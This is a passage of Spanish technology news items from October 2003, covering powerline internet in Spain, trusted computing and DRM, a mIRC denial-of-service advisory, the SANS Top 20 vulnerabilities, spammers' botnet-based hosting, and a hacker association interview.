Octubre 2003

Iberdrola ofrece un ancho de banda de 600 Kbps simétricos a 39 euros
Noticia enviada el Miércoles 15 de Octubre de 2003 por wolfbcn

La oferta se dirige en una primera fase a los barrios madrileños de Arroyo Fresno y Ciudad de los Periodistas

AGENCIAS

MADRID.- Iberdrola ha iniciado la comercialización de servicios de Internet a través de la red eléctrica mediante la tecnología de banda ancha PLC y con la gestión de su filial de telecomunicaciones Neo-Sky. El director de Telecomunicaciones de Iberdrola, Miguel Angel Sánchez Fornié, explicó que el lanzamiento se produce con un servicio a 600 kilobytes simétricos (es decir la misma velocidad para enviar que para recibir Internet) a un coste de 39 euros mensuales, y otro de 100 kilobytes a 24 euros al mes.

En rueda de prensa, los responsables de Neo-Sky, señalaron que en esta primera fase se comercializa el servicio entre los 30.000 habitantes de las zonas de Arroyo Fresno y Ciudad de los Periodistas de Madrid, y posteriormente se extenderá a las zonas de Arguelles y Chamberí.
Además han firmado un acuerdo con la Comunidad Valenciana para extender el servicio, antes de que termine el año, a distintos barrios de Valencia, Castellón y Alicante, y otras zonas de Chelva, Segorbe y Alcoy, también de esta comunidad.

Ofertas e instalación

Hasta diciembre, el alta, la instalación y el primer mes son gratuitos y el cliente puede desengancharse en los seis primeros meses sin coste adicional.

Para poder recibir el servicio Iberdrola se instala un pequeño aparato en una zona de la comunidad de vecinos y con él puede servir a todos los habitantes de la casa que sólo tendrán que instalar un modem que se conecta en cualquier enchufe de la luz.

Ese modem es propiedad de Iberdrola que se lo instala al usuario de forma gratuita y responde de su mantenimiento, también sin coste para el usuario.

Los aparatos instalados en las comunidades de vecinos se conectan con los equipos de cabecera situados en los centros de transformación y allí se conectan entre ellos a través de señales PLC en media tensión hasta una estación transformadora en la que se agrupan las señales de todos los clientes. Desde allí y mediante las redes de fibra, LMDS (tecnología local vía radio) y satélite se hace llegar la señal a Internet.

Los clientes dispondrán de cinco cuentas de correo de 25 megabytes, 10 megabytes de página personal y el mantenimiento de la cuenta que tuvieran.

Servicio, en 15 días

Sánchez Fornié dijo que Iberdrola se dirigirá a los clientes de las citadas zonas a través de buzoneo y en 15 días podrán tener el servicio.

Los responsables de Iberdrola, que no quisieron cuantificar la inversión realizada ni la futura, señalaron que la extensión del servicio se realizará teniendo en cuenta criterios de rentabilidad y orientación al cliente, y destacaron que este despliegue puede realizarse con una rapidez superior a otras tecnologías de acceso y a un coste competitivo, ya que no hay que realizar zanjas en las calles.

Respecto a los servicios de voz, señalaron que poco a poco irán extendiendo los servicios sobre la red y entre ellos estará la voz así como la lectura automática de contadores de la luz.

Iberdrola, igual que Unión Fenosa y Endesa obtuvieron la licencia C1 de la Comisión del Mercado de las Telecomunicaciones que les permite comercializar el acceso a Internet por la red eléctrica con la tecnología PLC.

Iberdrola, que ya anunció en enero que comercializaría el servicio a través de Neo-Sky, es el primer operador eléctrico que comienza a dar el servicio de forma comercial mientras que Unión Fenosa y Endesa ya han anunciado que están en conversaciones con la operadora de telecomunicaciones Auna para dar servicios de Internet a través de ella.

El acceso a Internet a través de la red eléctrica es plenamente competitivo con otras opciones disponibles actualmente en el mercado y contribuirá a incrementar la demanda de acceso en banda ancha. Además, ofrece simetría en las velocidades de recepción y emisión, así como una mayor capacidad y ubicuidad dentro del domicilio, ya que que cualquier enchufe eléctrico sirve para acceder a la Red.

FUENTE : http://www.elmundo.es/navegante/2003/10/15/empresas/1066215293.html

¿Intenciones fiables detrás de la "trusted computing"?
Noticia enviada el Martes 14 de Octubre de 2003 por wolfbcn

La política de Internet se hace con el código, sobre todo con el código, pero no el legal, sino el binario. Hoy en día hace más por la privacidad un programa que cualquier ley venida de Bruselas. Sin embargo el código binario no es suficiente para preservar la libertad de la Red; a largo plazo -hay que pensar en esto en el largo plazo- quien acaba dando forma al ciberespacio es el código escrito por los leguleyos. Por eso el mito de que el control completo es imposible es sólo eso, un mito que estamos obligados a desterrar ante el peligro de permitir que nos lleve a la inacción.
¿Puede ser controlada Internet?. La pregunta tiene de viejo casi tanto como la Red misma. Nadie se pregunta si la radio, como red de comunicaciones que es, la televisión o la red de telefonía móvil pueden ser controladas. Sí nos preguntamos si Internet puede ser controlada, y qué grado de libertad es posible en ella, es porque Internet nació con un diseño completamente diferente al del resto de redes de comunicación. Su arquitectura fue planeada con un diseño de mínimos para conseguir un máximo de libertad.

¿Puede entonces ser controlada Internet?. Dos instituciones de muy distinto perfil han dado respuestas a la cuestión en las últimas semanas que nos abocan al pesimismo. La Comisión Europea reconoce en un reciente informe el descenso de la privacidad en el entorno digital provocado tras los atentados del 11 de septiembre (1). No deja de ser relevante que sea una institución como la Comisión la que haga este acto de contrición. El clima de sospecha generalizada ha permitido el uso de nuevas tecnologías invasivas de la privacidad ("identity-management systems", "location-based services", "ambient intelligence") y el desarrollo de nuevas legislaciones a un lado y otro del Atlántico poco consideradas con la privacidad de los ciudadanos.

Por otro lado, la EFF ha publicado recientemente un análisis, "Trusted Computing: Promise and Risk" (2), sobre la "trusted computing" (informática fiable) en el que apunta a uno de los "posibles" y poco deseables usos de este nuevo paradigma informático: el control de los contenidos a través de dispositivos embebidos en el hardware de los ordenadores. La "trusted computing" es una iniciativa desarrollada con el propósito de aumentar la seguridad de los PC a través de cambios en el diseño del hardware. Proyectos como Palladium de Microsoft (rebautizado Next-Generation Secure Computing Base) o el apadrinado por IBM e Intel, Trusted Computing Platform Alliance (rebautizado Trusted Computing Group) están detrás del desarrollo de esta nueva plataforma.

A estas alturas no podemos permitirnos creer que el control de la Red es imposible, en cualquiera de los ámbitos que podamos imaginar. Sin embargo, en foros especializados, en los mismos foros donde hay una especial sensibilidad por el respeto de los ciberderechos, no es extraño encontrar opiniones del estilo "cualquier intento de limitar los derechos de la gente está destinado a fracasar". Si esto fuera verdad podríamos ahorrarnos mucha energía y sentarnos tranquilos a navegar desde nuestra casa, sin mayores complicaciones.

Pero esta creencia es profundamente equivocada. La Red nació bajo un diseño de creatividad y control descentralizado, pero la naturaleza de Internet es mutable, y los valores que su arquitectura permite hoy no son los valores que podrán ejercerse mañana. Los Estados y el sector empresarial van de la mano en su reforma de la Red. Tan provechoso es para nuestros gobiernos tener un ojo sobre sus ciudadanos, como para las empresas tenerlo sobre sus clientes.

El ámbito de la propiedad intelectual es especialmente interesante. La situación actual puede muy bien ser un espejismo en el que una Red preñada de la innovación y creatividad de los usuarios pase a estar controlada por los jerarcas de la información.

El informe de la EFF pone el dedo en la llaga de lo que puede ser una de la principales amenazas que levanten una valla electrónica alrededor de los contenidos digitales. La EFF presta especial atención en su informe a una de las propiedades de la "trusted computing": la autentificación remota. Una propiedad diseñada para que terceras partes puedan certificar el software instalado en los ordenadores. La autentificación remota allana el camino para la implementación de sistemas para la gestión de la propiedad intelectual (sistemas DRM), aunque desde las empresas implicadas se niegue que ése sea su objetivo (3).

Un servicio de contenidos, por ejemplo, puede pedir al cliente que tenga instalado un determinado software (por ejemplo el Windows Media 9) y solicitar el certificado (autentificación remota) para comprobar que ese software no ha sido alterado (se ha suprimido su sistema de DRM) para realizar actividades que no están autorizadas por el servicio (realizar una copia del contenido a un CD).

La idea central es controlar el entorno digital en sus extremos. Algo extremadamente difícil cuando estamos hablando de que el extremo de la Red son una máquinas multipropósito, de arquitectura abierta y moldeable como los ordenadores, pero que ha resultado extradordinariamente efectiva a la hora de fijar las propiedades de otro tipo de dispositivos digitales como los reproductores de DVD o los sistemas de grabación digitales actuales como el Tivo o ReplayTV(4).

La "trusted computing", reconoce la EFF, no está diseñada con el propósito de controlar el uso de contenidos, pero sólo la posibilidad de que pueda utilizarse en ese sentido debería ponernos sobre aviso. Quizá la "trusted computing" es poco fiable.



Informe de la Comisión Europea:
"Security and Privacy for the Citizen in the Post-September 11 Digital Age: A Prospective Overview"
(PDF, 2,47 MB).


Análisis de la EFF:
"Trusted Computing: Promise and Risk"


"Clarifying Misinformation on TCPA" (PDF)


Artículo en The New York Times sobre ReplayTV:
"ReplayTV's New Owners Drop Features That Riled Hollywood". (PDF)


Microsoft Next-Generation Secure Computing Base


Trusted Computing Group


ArturoBuendia


ArturoBuendia existe a través de sus escritos en la Red.
Bitácora de ArturoBuendia: http://barrapunto.com/~ArturoBuendia/bitacora


--------------------------------------------------------------------------------
Este trabajo se distribuye con licencia de Creative Commons Attribution-ShareAlike License. Para ver una copia de la licencia visite http://creativecommons.org/licenses/by-sa/1.0 o envíe una carta a Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
--------------------------------------------------------------------------------


FUENTE : http://www.kriptopolis.com/more.php?id=118_0_1_0_M

Denegación de servicio en mIRC
Noticia enviada el Martes 14 de Octubre de 2003 por wolfbcn

Se ha descubierto una nueva vulnerabilidad en mIRC, que puede ser
explotada para provocar una denegación de servicio durante una
comunicación por DCC.


mIRC es uno de los clientes de IRC (Internet Relay Chat) para entornos
Windows más populares entre los usuarios de dicho servicio y DCC es un
protocolo utilizado para el intercambio de archivos con otros usuarios
a través de IRC.

La vulnerabilidad descubierta se debe a un error durante el proceso
peticiones DCC, que puede ser explotado para interrumpir la ejecución
del cliente del usuario. No se ha querido dar una información más
detallada acerca de la naturaleza del problema que permite este
ataque, aunque se sabe que acepta a todas las versiones 6.x, incluida
la recientemente lanzada 6.11.

Se tiene constancia de que hay código de explotación de esta
vulnerabilidad circulando por la red, y que está siendo utilizado de
forma activa contra canales (tirando a todos los ops para conseguir
hacerse con ellos) y usuarios.

El autor del cliente de IRC ha sido informado de dicha vulnerabilidad,
pero mientras una actualización salga a la luz, se recomienda ignorar
las peticiones DCC de todos los usuarios excepto de los de confianza.
Si se quiere cortar por lo sano, se pueden ignorar todas las
peticiones DCC, con tan sólo escribir este comando:
/ignore -wd *

Julio Canto
jcanto@hispasec.com


Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/1813/comentar

Más Información:

mIRC DCC Exploit
http://www.irchelp.org/irchelp/mirc/exploit.html

mIRC
http://www.mirc.com/


FUENTE : http://www.hispasec.com/unaaldia/1813

Las 20 vulnerabilidades más críticas en Internet
Noticia enviada el Lunes 13 de Octubre de 2003 por wolfbcn

SANS Institute actualiza su lista Top 20 de las vulnerabilidades más críticas explotadas en Internet.

Hace tres años, SANS Institute, el FBI (policía federal de los Estados Unidos) y el NIPC (Centro de Protección de la Infraestructura Nacional de los Estados Unidos), confeccionaron la primera versión de esta lista con las 10 vulnerabilidades de seguridad más críticas.
Como en las últimas entregas, en esta cuarta revisión podemos encontrar dos listas, con 10 entradas cada una, separando las vulnerabilidades por plataforma según afectan a Windows o Unix.

Aunque estas vulnerabilidades son aprovechadas en un alto porcentaje de los ataques que actualmente se suceden en Internet, especialmente por gusanos, herramientas automáticas, y script kiddies, la realidad es que estos sistemas operativos se encuentran afectados por muchos más problemas de seguridad.

De forma que, si bien es muy recomendable repasar esta lista para asegurar que nuestros sistemas no se encuentran afectados, no debemos bajar la guardia respecto al resto de vulnerabilidades y las de nueva aparición, que pueden ser igualmente críticas.

Entre los problemas de seguridad más comunes, en especial en entornos corporativos, se encuentran las dificultades para hacer el seguimiento de todas las actualizaciones, nuevas vulnerabilidades, y amenazas que pueden afectar a un parque heterogéneo de sistemas.

Servicios como "una-al-día" pueden ayudar en parte a esta tarea, aunque la realidad es que la media de amenazas que aparecen cada jornada supera con creces la vulnerabilidad por día.

Un indicador más claro y real del número de amenazas que surgen puede observarse en las estadísticas de SANA, el Servicio de Análisis, Notificación y Alertas de Hispasec, dirigido a profesionales y corporaciones.

Ahora, desde la portada de la web de Hispasec (http://www.hispasec.com), en la columna derecha, es posible acceder a una gráfica y obtener datos cuantitativos en tiempo real sobre el número de avisos (vulnerabilidades, actualizaciones, etc.) que emite el servicio.

Volviendo al TOP 20 de SANS, las listas de vulnerabilidades quedan de esta forma:

Windows

W1 Internet Information Services (IIS)

W2 Microsoft SQL Server (MSSQL)

W3 Windows Authentication

W4 Internet Explorer (IE)

W5 Windows Remote Access Services

W6 Microsoft Data Access Components (MDAC)

W7 Windows Scripting Host (WSH)

W8 Microsoft Outlook Outlook Express

W9 Windows Peer to Peer File Sharing (P2P)

W10 Simple Network Management Protocol (SNMP)

Unix

U1 BIND Domain Name System

U2 Remote Procedure Calls (RPC)

U3 Apache Web Server

U4 General UNIX Authentication Accounts with No Passwords or Weak Passwords

U5 Clear Text Services

U6 Sendmail

U7 Simple Network Management Protocol (SNMP)

U8 Secure Shell (SSH)

U9 Misconfiguration of Enterprise Services NIS/NFS

U10 Open Secure Sockets Layer (SSL)

En la página http://isc.sans.org/top20.html pueden encontrarse la descripción de cada una de las entradas, sistemas afectados, métodos para determinar si un sistema es vulnerable, y las medidas de corrección y prevención que se deben adoptar.

FUENTE : http://iblnews.com/noticias/10/89217.html

Conexión por la red eléctrica
Noticia enviada el Domingo 12 de Octubre de 2003 por wolfbcn

Las tres grandes eléctricas españolas, Endesa, Iberdrola y Unión Fenosa, obtuvieron la semana pasada licencias de tipo C1 para transporte de telefonía y datos (Internet) a través del cableado eléctrico. Eso significa que podrán ofrecernos conexión a Internet usando cualquier enchufe eléctrico de nuestra casa u oficina.

Las tres operadoras están recibiendo cooperación técnica del Grupo Auna (que a su vez es la dueño de Retevisión), para la puesta a punto de un servicio denominado "Power Line Communications" (PCL), que posibilitará el transporte de telefonía y datos sobre el cabeado eléctrico.

La previsión es que este sistema podría funciona a mediados de 2004. Pero Endesa ya ha anunciado que comenzará su comercialización de forma casi inmediata: en noviembre en Zaragoza, con 20.000 hogares; y en enero del próximo año en Barcelona. Iberdrola también ha anunciado su rápida implantación, pero no ha querido anticipar fechas ni lugares concretos.

Para utilizar este sistema de conexión a Internet, será necesario utilizar un dispositivo intermedio entre el ordenador y la red eléctrica, aparato que será conocido como "módem PCL". Además, habrá que contratar el servicio PCL con la compañía que nos suministra la electricidad. Y no se necesitará ningún otro tipo de modificación en la instalación doméstica ni en el ordenador. La empresa eléctrica se convierte automáticamente en nuestro proveedor de acceso a Internet, y también en nuestra operadora de telefonía fija, si queremos.

La conexión será del mismo tipo que la del ADSL o cable: no hace falta realizar ninguna acción para "conectar", puesto que el ordenador está conectado permanentemente -si está encendido-. También permite hablar por teléfono al mismo tiempo, porque que no hay interferencia entre la conexión de datos y la telefonía. Aunque las operadoras todavía no han anunciado sus tarifas, todo hace pensar que el servicio de conexión a Internet tendrá un coste mensual similar al que ahora tiene el ADSL.

Esperemos que este servicio cumpla con las expectativas que está generando y que tenga una rápida implantación por todo el territorio. Para facilitar el seguimiento de esta iniciativa, la Asociación de Internautas ha creado una Comisión de seguimiento del PLC con la siguiente dirección de correo-e: plc@internautas.org .

Antonio Caravantes (antonio@caravantes.com)

FUENTE : http://www.caravantes.com/arti03/electric.htm

¿De qué van los internautas?
Noticia enviada el Viernes 10 de Octubre de 2003 por wolfbcn

Internet puede ser una auténtica mina de oro para sondear la opinión de los ciudadanos acerca de uno o varios temas. Existen empresas que rastrean continuamente foros, chats y grupos de noticias para 'medir' lo que piensan los usuarios sobre temas tan dispares como ADSL, salud, coches, viajes o juegos. Casi nada escapa a la Red.

La netnografía ('netnography') es un método surgido en Estados Unidos como una evolución en la Red de la etnografía, ciencia que estudia las características y prácticas habituales de un grupo social concreto. Sus defensores la definen como una alternativa a la antropología tradicional y destacan su mayor velocidad y calidad.
Mientras que la etnografía se basa en el análisis personal sobre el terreno y la interpretación posterior por parte del investigador, la netnografía utiliza sistemas informáticos para rastrear comunidades virtuales y proporcionar después todos los datos sobre la misma a los analistas, que son los encargados de dotar de sentido a la información y elaborar las conclusiones.



Recogida de datos

El proceso comienza cuando alguien, que puede ser desde un particular hasta una multinacional o un gobierno, encarga un estudio sobre un tema concreto. Es entonces cuando la empresa encargada de la netnografía pone en marcha su método de trabajo y elabora la lista de comunidades virtuales que van a ser objeto del análisis.

En un primer momento, se buscan todos aquellos foros y grupos de noticias que tengan relación con ese tema, incluso aunque no lo traten en exclusiva. Posteriormente, se eliminan los que no tienen un número relevante de usuarios o presentan un nivel de actividad demasiado bajo. En definitiva, se realiza un filtro selectivo para quedarse con una cantidad de comunidades manejable, pero suficiente para que los resultados finales sean representativos de la población total.

El siguiente paso es decidir qué duración tendrá la fase de recogida de datos. Lo habitual es que el seguimiento se realice a lo largo de tres o cuatro meses para obtener una información abundante que otorgue credibilidad a las conclusiones. Durante este período, los servidores dedicados al estudio rastrean una o varias veces al día las comunidades seleccionadas y almacenan los textos.

Para ello, siguen unas pautas establecidas previamente por los informáticos e investigadores de la compañía que realiza la netnografía. Los ordenadores están dotados de inteligencia artificial para filtrar los mensajes que envían los usuarios y recoger sólo los que sean útiles para el informe. Se basan en sistemas de palabras relacionadas, conceptos y sinónimos, de tal modo que son capaces de guardar textos que tengan algo que ver con el tema aunque no incluyan exactamente los nombres que se pretenden analizar.

Interpretación humana

Una vez que los datos han sido recogidos y convenientemente filtrados, finaliza la fase automática del proceso y entra en acción el elemento humano. Un grupo de personas, generalmente sociólogos, se dedican entonces a leer todos los mensajes y clasificar los comentarios según una lista de opciones establecida. Así, se convierten mensajes del tipo "El producto A es un lujo" o "No me gusta el producto B porque se rompe a los dos meses" en calificaciones como "bueno", "malo" o "regular".

Cuando ya se han analizado todas las valoraciones y se tiene una impresión general sobre las opiniones de los internautas acerca del asunto que se está estudiando, los investigadores hacen una evaluación global e interpretan las estadísticas obtenidas. De este modo, se redactan unas conclusiones que serán entregadas junto con el informe final.

En resumen, las netnografías combinan dos actividades, una automática y otra manual, con el objetivo de añadir la capacidad de síntesis del hombre a la potencia y velocidad que aportan los ordenadores. Con esto, se pretende conocer qué piensan los usuarios sobre un producto con el fin de determinar las ventajas e inconvenientes de lanzarlo al mercado o, una vez comercializado, saber qué impacto ha tenido en la sociedad o qué se puede mejorar para alcanzar un mayor éxito en el futuro. También se puede aplicar a ideas, proyectos políticos, instituciones, marcas o cualquier elemento susceptible de generar opiniones en la Red.

LUIS TEJERO


FUENTE : http://www.elmundo.es/navegante/2003/10/10/esociedad/1065788263.html

Un disfraz para los spammers
Noticia enviada el Jueves 9 de Octubre de 2003 por wolfbcn

Objeto de miradas de desdén en el pasado, el negocio del correo basura hoy atrae a muchos crackers ambiciosos.
Las últimas innovaciones desarrolladas por esos hackers mercenarios para beneficio de los profesionales del correo basura son una serie de técnicas que les permiten a los spammers -o a cualquier estafador-crear sitios web imposibles de rastrear.


Un grupo de Polonia está publicitando su "hosting invisible a prueba de balas" en foros online dedicados a spammers. Por 1.500 dólares al mes, el grupo asegura que puede proteger los sitios web de las herramientas de investigación de redes empleadas por quienes combaten el spam, como por ejemplo traceroute y whois.

Hasta ahora, quienes luchan contra el spam venían utilizando esas herramientas para identificar las direcciones de protocolo de Internet de los sitios web publicitados por los mensajes de spam. En el pasado, lograr clausurar un sitio empleado para vender productos publicitados a través del spam -o para estafar usuarios incautos empleando phishing, es decir, utilizando el nombre de alguna empresa para sonsacar datos del usuario - era simplemente una cuestión de notificar a la empresa de hosting responsable de la dirección IP.

Pero las nuevas técnicas hacen que esas herramientas resulten inservibles, según lo dicho por especialistas que conocen el método.

Según Tubul, un representante del grupo polaco que no estuvo dispuesto a dar su nombre completo, lo grandioso del hosting invisible es que el sitio web puede localizarse incluso en servidores operados por empresas de hosting web de primera línea con enérgicas políticas antispam.

Cuando se le solicitó en un chat que hiciera una demostración del servicio de hosting oculto, Tubul proporcionó la dirección de un sitio web que vende Viagra y otros medicamentos genéricos.

"Traten de identificar el IP real", dijo. "El host es rackshack.net, el ISP más antispam que existe".

Un ruteo al sitio utilizando traceroute indicó que aparentemente estaba alojado en una computadora que emplea el servicio de cablemódem provisto por Comcast.

"Falso", señaló Tubul.

En efecto, cuando se volvió a realizar el ruteo momentos más tarde, pareció estar alojado en una computadora con conexión DSL de Verizon.

Otro sitio alojado por el grupo polaco ofrece consultas gratuitas acerca de créditos. Los rastreos del sitio, removeform.com, también proporcionaron resultados que cambiaban de un momento a otro y que iban desde una computadora conectada a una línea DSL en Israel hasta otra con servicio de EarthLink. Sin embargo, el título de la página de inicio del sitio siguió mostrando la leyenda "Yahoo Web Hosting", lo cual sugería que estaba localizada en un servidor operado por el gigante de Internet.

Según Tubul, su grupo controla 450.000 sistemas en los que han instalado troyanos, en su mayoría computadoras hogareñas con sistema operativo Windows y conexiones de alta velocidad. Los sistemas hackeados contienen software especial desarrollado por el grupo polaco que rutea el tráfico entre los usuarios de Internet y los sitios web de sus clientes a través de miles de computadoras "secuestradas". La enorme cantidad de sistemas intermedios confunde a las herramientas como traceroute y oculta la verdadera ubicación del sitio web. Para utilizar el servicio, los clientes no tienen más que configurar sus sitios para que utilicen cualquiera de los varios servidores de sistemas de nombres de dominio controlados por el grupo polaco, explicó Tubul.

Si bien el precio del servicio puede ser elevado, frustra "en forma definitiva" los intentos de quienes combaten el spam de rastrear las verdaderas direcciones de los sitios web, según lo señalado por Joe Stewart, un investigador de seguridad de Lurhq.

"No va a conseguir mucho tratando de seguir una dirección IP a través de hosts hackeados", dijo Stewart. "Lo único que se puede hacer es seguir el dinero: comprar lo que sea que estén vendiendo y tratar de identificar quién está detrás de todo esto".

El empleo de técnicas de hosting oculto de estas características se encuentra muy difundido entre los spammers, según Steve Linford, director de Spamhaus Project, que lleva una lista negra de las operaciones conocidas de correo basura. Linford indicó que las recientes alianzas entre spammers y crackers se encuentran en el origen de las nuevas técnicas.

"Los hackers detestaban a los spammers, pero ahora que el spamming se ha convertido en un gran negocio, de repente es genial ser spammer", dijo Linford. Agregó que el negocio del correo basura también atrae a muchos "ingenieros que han sido despedidos y gente que sabe mucho de redes y DNSs".

El atractivo del dinero también parecería haber llevado a los escritores de virus al negocio del spamming. Linford indicó que cree que el gusano de correo masivo Fizzer fue obra de un escritor de virus asociado con un spammer. Además, Stewart y otros especialistas piensan que la primera variante del gusano Sobig tiene el objetivo de convertir las computadoras afectadas en servidores proxy para spam.

En un nuevo esfuerzo por comprometer más sistemas e incorporarlos a su arsenal, el grupo de Tubul parece estar recurriendo a sitios publicitados a través de spam para infectar a los visitantes con programas maliciosos. Informes recientes publicados en foros online dedicados a la lucha contra el spam indican que un sitio "invisible" llamado miracleformen.com intentaba instalar un archivo ejecutable muy sospechoso en las computadoras de los visitantes aprovechando una vulnerabilidad del navegador Internet Explorer de Microsoft.

Según Stewart, los spammers y estafadores empezaron a recurrir a los servicios de crackers que controlan grandes redes de computadoras hace cerca de un año. El verano pasado (invierno en el hemisferio sur), se utilizaron computadoras "invadidas" para dar hosting a sitios web dedicados a la pornografía y a implementar técnicas de "phishing" para obtener números de tarjetas de crédito, según una investigación llevada a cabo por Stewart y por el asesor de seguridad Richard M. Smith.

Una estrategia que permitiría mitigar el problema del hosting invisible, señaló Thor Larholm, un investigador del campo de la seguridad de Pivx Solutions, consistiría en que los proveedores de servicios de conexión a Internet o registros de dominio hicieran una lista negra de los servidores DNS empleados y los excluyeran de Internet.

Pero Tubul explicó que su grupo cambia de servidores DNS regularmente para protegerse contra las tácticas de ese tipo.

Linford señaló que si bien muchos ISPs parecerían no comprender la gravedad del problema que plantea el hosting invisible, las autoridades han empezado a investigar la cuestión.

"Estas personas no sólo están violando las reglas impuestas por los ISP", dijo Linford. "Se trata de tipos que realmente tienen que pasar un tiempo en la cárcel".

Brian McWilliams


FUENTE : http://us.terra.wired.com/wired/tecnologia/0,1157,25318,00.html

SISTEMA ANTICOPIA DE LOS CD SE DESACTIVA PULSANDO MAYUSCULAS
Noticia enviada el Miércoles 8 de Octubre de 2003 por wolfbcn

¿Os acordáis del sistema de protección de CDs que podía ser evitado con un rotulador? Pues el último y "revolucionario" sistema anticopias es aun más fácil de saltar. Tras ser presentado con trompetas y fanfarrias hace escasamente un par de semanas, y adoptado de inmediato por BMG, el sistema MediaMax CD3 se ha mostrado de los más frágiles del mercado.

El sistema, que prometía la imposibilidad de copiar sus contenidos, incluía en cada CD los archivos de audio del CD en formato Windows Audio y protegidos por DRM.

No obstante y según una investigación llevada a cabo por John Halderman, del Departamento de Ciencias de la Computación de la Universidad de Princeton, el sistema puede ser evitado simplemente pulsando una tecla.

En un detallado análisis de como funciona el mecanismo de protección Halderman revela que el secreto del sistema reside en un pequeño programa que se ejecuta de manera invisible al usuario tras ser insertado el CD en el ordenador.

El programa instala un driver en el sistema que impide al usuario realizar las copias de las pistas.

El problema reside en que el programa es un "autorun" que puede ser evitado, desactivado el autorun del sistema, simplemente pulsándola tecla mayúsculas a la vez que introducimos el CD. Algunos usuarios ya lo tienen desactivado por defecto, por lo que el sistema anticopia ni les afecta.

Por otro lado y para aquellos usuarios que ya hayan instalado el driver este es posible eliminarlo desde el panel del control del sistema.

Más info: http://www.cs.princeton.edu/~jhalderm/cd3

Fuente: Hispamp3

Este artículo proviene de AIH - Infohackers.org
http://www.infohackers.org

La dirección de esta noticia es:
http://www.infohackers.org/article.php?sid=2049

Cómo pagar más al empleado sin subirle el sueldo
Noticia enviada el Martes 7 de Octubre de 2003 por wolfbcn


Tras el verano, empieza la clásica 'despachitis' para conseguir un aumento de sueldo. La correduría Willis ha desarrollado un software que, sobre la base de la retribución en especie, permite al empleado obtener mayores beneficios sin elevar los costes salariales.


Ruth Ugalde / Expansión.

Las empresas llevan tres años apretándose el cinturón. Sin embargo, este talante comedido no evita que los empleados, cada día más cargados de trabajo, entren en el despacho del director para pedir un aumento de sueldo. William Ury, el gran gurú de la negociación, diría que la solución radica en conseguir que los empleados, con el mismo sueldo, consigan mayores beneficios. Así, la empresa tampoco tiene que elevar sus costes.

Esta idea es el punto de partida de la retribución en especie, que ha encontrado en la tecnología el mejor y más sencillo vehículo para tenerlos a todos contentos. "Un sencillo software permite al empleado negociar directamente cómo va a distribuir su salario en función de sus necesidades familiares y profesionales", explica Ana María Matarranz, directora comercial de la correduría Willis. Esta compañía ha desarrollado un programa que permite dividir el sueldo hasta en doce productos diferentes, como seguros, cursos de formación o coche de empresa.

El secreto de esta fórmula radica en que, como las empresas firman convenios colectivos, los trabajadores se pueden beneficiar de estos programas a un precio más reducido. "A través del software, el empleado puede ver cuánto le costaría a él contratar estos servicios de manera individual y compararlo con el ahorro que obtiene al contratarlo a través de la empresa. De este modo, él saca mayor rendimiento de su salario sin que se traduzca en un incremento de los costes salariales para la compañía", explica Matarranz.

Fidelización de la plantilla
Willis, además de desarrollar este software a la medida de cada empresa, ofrece asesoramiento a los directivos y empleados a la hora de decidir cómo quieren distribuir su salario. "Este programa permite un ahorro medio del quince por ciento pero, además, ayuda a fidelizar a los empleados porque algunos de sus beneficios sociales están ligados a la permanencia en la compañía", señala Matarranz.

De este modo, si otra empresa competidora desea hace una oferta económica a un trabajador para que cambie de compañía, "no le bastará con ofrecerle un veinte por ciento más, sino un cuarenta por ciento para poder superar los beneficios que el empleado ya tiene, aunque su salario en metálico sea inferior".

"Nosotros también ofrecemos asesoramiento sobre cómo sacar el máximo partido en función de las necesidades personales de cada profesional", destaca Alejandro Pulido, directivo de Willis, quien puntualiza que, "por normativa legal, el salario en especie no puede superar el treinta por ciento del sueldo bruto. Por eso, este sistema no es conveniente para profesionales con un salario inferior a 36.000 euros si se quieren obtener márgenes de ahorro significativos".

Una de las principales ventajas del software de Willis es su fácil manejo. "Hay empleados que hacen mil cábalas sobre cuánto podrían ahorrar en función de un determinado salario", reconoce con humor Matarranz. Con tan sólo utilizar el tabulador y el ratón, los trabajadores pueden realizar todas las operaciones que necesitan. Además, para salvaguardar la confidencialidad, cuentan con una clave personal que les lleva directamente a una pantalla con sus datos personales.


FUENTE : http://www.expansionyempleo.com/edicion/noticia/0,2458,399408,00.html

Los hackers españoles quieren «limpiar» la mala imagen que la sociedad tiene del colectivo
Noticia enviada el Lunes 6 de Octubre de 2003 por wolfbcn



El presidente de la Asociación para la Información de Hackers (AIH), Javier Garaloces, explicó a Europa Press que "la sociedad tiene una mala imagen del hacker" debido a que "se han formado varias comunidades de hackers y crackers y no se ha establecido una diferenciación entre ellas". En este sentido, el presidente de la AIH añadió que "uno de los objetivos de la asociación es limpiar la mala imagen del colectivo".

"En contra de lo que muestran los medios de comunicación, los hackers nos consideramos útiles a la sociedad" aseguró Garaloces. El presidente de la AIH explicó que "el hacking es una actitud ante la vida". Según explicó Garaloces, el hacker tiene un compromiso social y uno de sus principios es "el conocimiento libre". "Creemos que la información debe circular libremente y que no debe prohibirse el acceso a ella", aseguró el presidente de la AIH que añadió que "esta actitud te la puedes encontrar desde en un estudiante hasta en un fabricante de quesos". Respecto al objetivo que persigue el hacker con su actividad, Garaloces afirmó que se trata de "conseguir el reconocimiento de la comunidad y sentirse útil".

El movimiento hacker nació "hace unos 10 años" en España y la mayor parte de los componentes de este colectivo "son autodidactas", según indicó el presidente de la asociación. Actualmente forman parte activa de la AIH un total de 250 personas "que tienen desde 12 hasta 60 años, aunque el núcleo duro lo conformamos gente de entre 25 y 35 años", explicó Garaloces.

La AIH es una asociación "sin ánimo de lucro" dedicada a informar y a formar a hackers. Actualmente tiene en marcha varios proyectos, entre los que destaca la redacción de un libro sobre técnicas de hacking que publicará la editorial Nowtilus. Además, se dedica a la traducción al español de programas de código libre e imparte diversos cursos ´on-line´ de formación. "Nuestra idea es tender una mano, que todo el mundo que quiera pueda llegar a ser hacker", declaró Garaloces.

Además, la asociación participa desde el pasado abril en una campaña contra la pornografía infantil en Internet, de acuerdo con el departamento de comunicación de la organización no gubernamental Anesvad. Los hackers que forman parte de la asociación trabajan en la destrucción de eset tipo de páginas web.

DIFERENCIA ENTRE HACKER Y CRACKER

